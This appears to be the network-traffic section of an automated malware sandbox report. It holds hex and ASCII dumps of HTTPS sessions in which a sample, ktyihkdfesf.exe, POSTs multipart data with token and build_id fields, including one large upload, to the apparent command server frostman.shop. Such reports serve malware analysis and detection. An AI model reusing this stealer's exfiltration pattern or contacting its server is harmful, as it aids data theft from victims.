                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 32 3a 31 31 20 30 30 3a 35 33 3a 35 33 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                                                                                                Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.1 (Windows)2023:02:11 00:53:538C
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 9d 69 cd ef 46 28 01 29 31 4b 45 00 36 8c 66 9d 48 d4 00 98 f6 a6 d3 bf 86 8a 00 6d 14 51 40 03 51 45 14 00 53 58 0d ad 9a 75 36 80 3e 64 fd a9 34 99 1f c4 53 eb 96 d6 77 b6 aa bb 76 c8 d9 df b1 be 55 57 c7 dc dd b5 8a a9 27 e4 03 8a f3 0f 0d ea 26 e7 58 81 2e 2f 3c a9 5b ee b6 dd aa a5 46 54 e5 7a 7e 15 f6 27 c5 cf b4 8f 06 df 49 2e 9b 63 a8 58 c7 6d 20 58 de 37 92 e1 65 61 b4 32 28 e3 9e 9e b8 af 98 b4 9f 01 db ea 1a 1e ae 20 db 3e bb 3b 47 16 97 a7 c1 26 d3 19 32 7c fb d7 bf cb c0 04 f1 d7 d2 bc fc 55 24 ea 5b b9 d3 19 b4 94 91 d0 7c 37 f8 8d 2e 8d aa 58 c9 e2 9d 31 7c 47 61 a7 7c eb 06 a0 de 61 8c 39 dc c2 22 d9 0a 49 c6 72 0d 74 9f 11 b4 6f 04 78 a7 e1 2a f8 c7 40 b9 d2 ec fc 49 3c 6d 25 ee 93 6c ce f3 2e d9 1d 9d ca f4 50 17 1c 91 81 c0 1c 9a f1 d4
                                                                                                                                                                                                                                                                                                Data Ascii: iF()1KE6fHmQ@QESXu6>d4SwvUW'&X./<[FTz~'I.cXm X7ea2( >;G&2|U$[|7.X1|Ga|a9"Irtox*@I<m%l.P
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 52 76 f4 3a 8d 7b 46 f1 0f 87 ef af 34 0f 07 ea 17 da 87 87 75 25 59 d7 50 fb 33 d9 db de 18 a3 12 3c 8b e6 10 76 a6 78 3d fb 75 15 c0 de 5d 7d be ce 3b 21 6d 04 ac ae 1d ae f6 95 38 c6 36 16 fe e8 eb d3 24 fa d7 d0 df 1a bc 0f 73 a5 f8 4f 4e f1 06 b1 e1 9d 4a df c3 ad 1d b1 b9 8a ef 52 fb 4d e5 d3 88 b6 a0 79 d7 22 da 27 3b 4f 96 39 f9 07 e1 e1 ba ad fd a2 df 41 35 e6 9f 1e d5 60 5a d2 d2 4f 26 3e 07 40 dc 9f 43 9e 79 ac aa 5e 15 79 59 ad 93 8d cc 59 3c 3f aa c5 aa 7d 8c 2a ad d4 6c 06 d5 90 6f c9 1c 60 fd 3f 2a f5 5d 1b 5a f0 e6 a1 e0 55 f0 df c4 4b 9b 6b c8 f4 b8 a2 87 48 9e c7 09 75 a7 c7 cb 49 0a 6e 00 38 2d d4 93 d5 b3 ce da f3 dd 11 67 5b 79 75 9b 3b c8 e3 68 a7 cc 90 4a a5 f9 f4 3e c6 a2 d4 2c 52 ea 19 ef ed 25 8e 38 d6 42 15 59 be 66 20 64 e0 75
                                                                                                                                                                                                                                                                                                Data Ascii: Rv:{F4u%YP3<vx=u]};!m86$sONJRMy"';O9A5`ZO&>@Cy^yYY<?}*lo`?*]ZUKkHuIn8-g[yu;hJ>,R%8BYf du
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: da 06 e7 c7 7e 7a d6 ef 8c e2 93 51 b8 9c 78 62 ce 3d 3c d9 ca 51 64 da 3f 85 37 ba fc a3 e6 25 71 ed d7 9a 86 48 20 bb d1 f4 9d 70 5b 58 c5 6d 2c 19 6f 36 43 bb cf 07 1f 36 01 e7 1f 36 3d 2a 96 25 f2 a9 4d 7b ad ed e6 4c a8 f4 4f de 5d 7c 8a fa 83 96 f0 bc 77 11 34 92 19 62 52 cd b7 06 37 23 19 c7 d7 f2 cd 15 a7 65 a6 ea 1a a5 af 9b 79 72 b6 ad 6d 11 78 a1 8d 42 b4 91 9f 9c 10 49 c7 3d 4f a5 15 9d 3a d4 6d 69 3d 4d 9d 1a 93 49 d8 fb c7 14 11 4b 45 7d 91 f3 63 68 a7 63 da 93 14 00 ca 29 e4 52 35 00 35 85 14 ea 6d 00 23 52 63 da 9d 46 3d a8 0e a3 69 31 4e c6 69 68 01 98 a4 a7 63 da 8a 00 6d 23 53 e9 31 40 ac 25 26 29 71 ed 45 3b 88 6d 18 f6 a7 74 a2 90 f6 23 a2 9d 45 01 b8 da 29 d4 98 a0 42 53 7a 53 a8 c7 b5 3b 80 da 29 71 46 28 b8 0d c5 25 3a 8a 2e 03 68
                                                                                                                                                                                                                                                                                                Data Ascii: ~zQxb=<Qd?7%qH p[Xm,o6C66=*%M{LO]|w4bR7#eyrmxBI=O:mi=MIKE}chc)R55m#RcF=i1Nihcm#S1@%&)qE;mt#E)BSzS;)qF(%:.h
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 6f 1e 81 69 aa dc e9 57 11 b1 f2 ec a7 8f 62 ae f7 da d2 c5 22 e7 81 d4 b9 e9 57 19 46 1f bc 9f c2 82 10 a9 37 cb 05 76 7b e6 b5 f1 4f 44 f8 29 f0 9f 4f b7 92 f3 50 be d7 af ad 04 f1 40 d1 c4 d6 f9 25 d6 14 95 88 dc aa 91 a8 da 9d 76 fa 66 bc 5e f3 fe 16 0f 8f 23 b7 b8 d6 2c 6e ed b5 2d 42 5f 32 f6 59 2d 8c 6e d1 b7 cc 90 40 a4 12 7e 52 a7 1e 86 ab 5a db 47 e1 cd 3e c6 fe 7d 71 a2 d6 63 dd 22 ea f7 30 0b c6 87 cd 38 69 16 37 e0 b0 5f 95 49 fc 31 5e 95 f0 a7 59 7f 17 fc 44 d2 b4 ff 00 0b de 6b 36 d7 36 96 92 95 9e ee d0 23 dc 3a a6 f2 e8 b9 3f eb 0e 72 d9 e9 ed 8a e1 a9 5a 9e 36 2a 10 5a 26 7a 94 e9 cb 08 db 97 55 73 9e 87 e1 d7 89 3c 33 a1 da a5 cc 0b 38 56 32 41 7a d2 22 99 0e 0f 0e c3 b7 5e 09 f5 aa 3f 0d 7e 0b 78 87 c7 1e 32 d5 65 b2 d4 23 b6 b0 b5 b6
                                                                                                                                                                                                                                                                                                Data Ascii: oiWb"WF7v{OD)OP@%vf^#,n-B_2Y-n@~RZG>}qc"08i7_I1^YDk66#:?rZ6*Z&zUs<38V2Az"^?~x2e#
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: fd 1a 3b 66 8a 3b 55 f9 59 97 6a aa 1e 7e 5f 4f eb 4b e1 fb cb 9d 3e e9 af 74 8b 1f 35 67 51 0f 97 b7 63 29 27 e5 1f ec 8c f3 c5 36 fa c6 fe db 56 9e e7 57 bc fb 65 da a0 12 47 0c 86 44 86 33 c9 27 b6 05 65 18 a5 59 4a ff 00 23 aa 32 fd cf 2d b5 7d 4c bd 3f 51 d4 34 88 63 b8 8a 76 8e 4f 28 ec fe ee 0f 50 7b 9c 8a a7 af 5e 49 2e b1 3c a6 06 8f ed 4c b3 6c 8f fe 59 83 cf 53 cf bd 6c d8 0d 32 6b 59 0e a2 de 7c d2 3b 79 4d 17 4c 0f ba 3e 87 26 b2 bc 49 34 b1 cd 1c 56 f0 46 bb 63 03 72 fd f6 e7 ab 66 ba 60 ef 3d b5 39 aa 26 a1 be 84 5a ad 85 b4 93 2d cd e2 fd 94 49 8d b1 f5 91 b3 d0 af 6c 7f 2a a3 79 3c 90 d9 c9 6c 7c b8 83 61 f7 7d e7 5e dd 7d eb aa f3 af 35 cf 0d ac 5a 8e 9f e5 5c c1 81 6d 3c 7f f2 d0 20 fb a5 7a e7 df a1 35 91 a8 43 04 1e 19 c3 c1 b6 5f b6
                                                                                                                                                                                                                                                                                                Data Ascii: ;f;UYj~_OK>t5gQc)'6VWeGD3'eYJ#2-}L?Q4cvO(P{^I.<LlYSl2kY|;yML>&I4VFcrf`=9&Z-Il*y<l|a}^}5Z\m< z5C_
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 62 9d 8a 3a d0 03 5a 91 85 3b 1e d4 84 50 02 51 4a 45 23 50 03 5a 8a 75 26 28 01 94 63 da 9d 4d a0 56 06 14 98 a7 35 18 a7 70 b0 cc 7b 51 8f 6a 75 26 28 b8 58 6e 29 31 ed 52 53 71 ed 45 c2 c3 71 ed 48 c2 9e c2 93 14 c5 61 98 f6 a3 1e d4 ec 7b 50 d4 00 c6 14 8c 2a 4a 6d 00 37 1e d4 98 a7 62 86 14 00 cc 7b 52 63 14 fc 7b 51 40 0c c5 26 3d a9 f8 a4 c7 b5 00 37 1e d4 98 a7 62 8c 50 03 28 61 4e f9 69 31 40 0c a5 6a 76 29 94 ee 2b 05 36 9f 8a 46 14 5c 2c 26 29 1a 9d 8f 6a 28 b8 58 8e 95 a9 69 b4 5c 41 45 2e 29 29 00 53 69 d4 50 03 71 ed 4d a7 51 40 0d a4 c5 2d 0d 40 09 8a 4a 5c 52 d3 b8 0d a6 d3 a8 eb 45 c5 61 b4 51 45 31 08 d4 b4 51 40 0d a6 d4 94 da 00 6d 14 ea 46 a0 04 a8 2f d6 e0 db e6 d1 95 65 5e 55 64 5d cb 20 1d 57 f1 f5 ec 6a 7a 31 9a 00 cd f0 e6 b1 67
                                                                                                                                                                                                                                                                                                Data Ascii: b:Z;PQJE#PZu&(cMV5p{Qju&(Xn)1RSqEqHa{P*Jm7b{Rc{Q@&=7bP(aNi1@jv)+6F\,&)j(Xi\AE.))SiPqMQ@-@J\REaQE1Q@mF/e^Ud] Wjz1g
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16067INData Raw: 03 31 46 05 2d 0c 28 01 b4 8c 29 d8 a5 a0 08 f1 ed 46 3d a9 d4 da 35 01 31 8a 46 a7 51 4e e0 31 86 69 2a 4a 6b 0a 2e 03 5a 93 ad 3b 14 62 8b a0 19 4d a9 1a 8a 2e 03 1a 91 bf f1 da 76 3d a8 61 45 c0 66 29 68 c7 b5 18 f6 a2 e0 33 14 35 3e 9b 4c 56 1b 45 2e 29 18 50 20 a6 b5 3a 93 19 a7 70 19 4b fc 54 b4 66 8b 80 d6 07 14 51 46 3d a8 b8 0c c5 25 3f 14 62 8b a1 58 65 14 ea 6d 31 0d 61 4d a9 31 ed 49 8a 00 63 51 4e c7 b5 26 28 01 ac 0e ea 4a 76 3d a8 61 40 11 d2 e2 9d 8a 4c 7b 50 03 68 a5 c6 29 28 00 a6 e3 da 9d 45 00 36 91 a9 68 a0 56 1b 43 51 45 02 1a d4 63 da 9d 45 00 47 45 3b 1e d4 da 00 28 a2 8a 00 4c 52 63 da 95 a8 6a 00 6e 29 31 4e a3 1e d4 ee 2b 0c c7 e7 49 29 11 a3 b9 e9 1a 92 df 87 35 c3 7c 4c f8 a1 e0 ff 00 0b dd 36 99 af 6b d1 e8 f2 06 c3 7d ad 5c
                                                                                                                                                                                                                                                                                                Data Ascii: 1F-()F=51FQN1i*Jk.Z;bM.v=aEf)h35>LVE.)P :pKTfQF=%?bXem1aM1IcQN&(Jv=a@L{Ph)(E6hVCQEcEGE;(LRcjn)1N+I)5|L6k}\
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 86 2b aa f8 77 6a 9a b4 d7 da 4b ac 91 ff 00 69 5a 37 94 ab 3e c4 f3 10 6e 1b f3 db 8a 25 1d 0d 28 a6 df 2f 73 07 4b d4 64 b8 99 43 c0 d2 0d c1 be f6 d5 91 c7 f7 8f 6a bd 30 9a de 48 61 13 b4 9e 63 67 f7 59 dc df de fa 6d a8 b4 2b 73 6f 71 10 db 1e ed c5 24 66 f9 9a 33 e8 2a cf 8a 2c a4 8a de 3b e4 8a 78 fe d3 21 2a aa bb 51 93 18 24 01 f7 73 de b3 94 52 96 9b 07 2b 50 bb dc c8 b8 62 fa b2 c7 25 dc 9f 65 dd f7 a3 fe 20 39 e2 b6 ed e0 dd 6a b1 c5 17 97 12 c8 0b c9 e6 7f 1f 61 ec dd 2b 0a c7 4f 9e 6d c0 6e f9 7e 76 66 8f e5 c0 e9 83 db 9a e8 b5 47 df 67 6b 6e 2d a3 61 e5 8f 95 9b b8 ec 1b a1 3e f8 a8 ab f1 24 99 34 af 7d 8b b6 13 59 5a da cb 0b 79 7a 96 ef bd b9 48 11 be 7b b9 eb f4 1c 55 0b 8b 10 be 6a 5e 2d b4 f7 17 32 66 35 81 bf d5 9c e4 11 f4 e9 8a ce
                                                                                                                                                                                                                                                                                                Data Ascii: +wjKiZ7>n%(/sKdCj0HacgYm+soq$f3*,;x!*Q$sR+Pb%e 9ja+Omn~vfGgkn-a>$4}YZyzH{Uj^-2f5
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:22 UTC16384INData Raw: 7d e5 84 9e b9 1d cf d7 ad 73 fb 1e 5b f5 67 4f b6 4d 5b 61 37 08 61 9e 09 15 59 a5 c1 56 5f e1 c7 f4 f6 a8 65 4b 26 ba 84 89 57 6b 36 24 6f ee f6 cf e2 6a 47 90 bd af ef 62 95 8e d1 ba 46 f9 7b e4 8f 6a af 15 be 6c db 0a aa f2 3e 37 33 6e 6f ca a9 47 76 73 ca 2d 3f 23 77 c3 3e 55 a5 c4 f2 8d bf 67 66 2a cc cd f2 e7 b6 3f c2 93 5c bd 02 ce ea 28 db cc 33 46 37 7c a7 6b 1c f6 f5 c7 5a 49 2c ed e0 bc 58 87 98 d1 b4 61 64 69 18 2e d3 8e c3 a6 49 f4 a8 54 c5 37 f0 f9 86 05 09 e5 ff 00 0e 33 8c f3 eb f9 d7 2b 49 cb 9f 73 a9 d5 fd df 22 31 af e7 b8 10 cb 34 8a b9 69 d4 b7 cd f7 40 1c 0e 2a dd a5 c2 a5 bc 51 1d cb 33 64 ed da 36 e0 f4 19 ad 96 b4 48 a4 8a 43 3e d2 cb 95 8d 54 32 36 3a 73 59 f7 36 e2 48 e4 96 4d aa b1 63 ee b7 0c 73 fc ab a6 35 14 d1 cd ca ef 7b
                                                                                                                                                                                                                                                                                                Data Ascii: }s[gOM[a7aYV_eK&Wk6$ojGbF{jl>73noGvs-?#w>Ugf*?\(3F7|kZI,Xadi.IT73+Is"14i@*Q3d6HC>T26:sY6HMcs5{


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                27192.168.2.649799116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:24 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 505
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:24 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------AAAAAAAAAAAAAAAAAAAAContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------AAAAAAAAAAAAAAAAAAAACont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:25 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                28192.168.2.64979620.198.119.143443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:25 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 75 35 70 45 57 6d 5a 54 49 6b 65 37 68 2b 6b 77 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 32 66 34 39 64 61 30 39 34 32 63 36 33 61 33 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: CNT 1 CON 305MS-CV: u5pEWmZTIke7h+kw.1Context: f2f49da0942c63a3
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:25 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:25 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 75 35 70 45 57 6d 5a 54 49 6b 65 37 68 2b 6b 77 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 32 66 34 39 64 61 30 39 34 32 63 36 33 61 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 57 41 67 71 57 45 72 79 2b 58 4c 4c 62 39 36 74 49 6e 46 59 46 52 6d 45 4a 79 68 6f 6e 68 62 6f 70 54 44 2b 31 43 7a 4a 57 38 42 6e 73 45 78 33 59 78 42 2f 57 52 75 64 70 67 37 4a 71 62 57 77 70 71 65 61 65 56 31 30 62 2f 34 4a 64 4a 4a 50 44 75 61 32 74 57 75 73 31 4b 74 58 62 50 65 33 34 39 67 2f 47 46 4b 61 5a 36 72 62 33
                                                                                                                                                                                                                                                                                                Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: u5pEWmZTIke7h+kw.2Context: f2f49da0942c63a3<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAWAgqWEry+XLLb96tInFYFRmEJyhonhbopTD+1CzJW8BnsEx3YxB/WRudpg7JqbWwpqeaeV10b/4JdJJPDua2tWus1KtXbPe349g/GFKaZ6rb3
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:25 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 75 35 70 45 57 6d 5a 54 49 6b 65 37 68 2b 6b 77 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 32 66 34 39 64 61 30 39 34 32 63 36 33 61 33 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: BND 3 CON\QOS 56MS-CV: u5pEWmZTIke7h+kw.3Context: f2f49da0942c63a3
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:25 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:25 UTC58INData Raw: 4d 53 2d 43 56 3a 20 48 68 6a 41 34 30 68 59 6b 45 36 44 31 74 32 7a 46 51 48 41 6d 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                Data Ascii: MS-CV: HhjA40hYkE6D1t2zFQHAmg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                29192.168.2.649805116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KXBA1VAI58YMYU379R1D
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 213453
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 58 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 41 31 56 41 49 35 38 59 4d 59 55 33 37 39 52 31 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------KXBA1VAI58YMYU379R1DContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------KXBA1VAI58YMYU379R1DContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------KXBA1VAI58YMYU379R1DCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:26 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
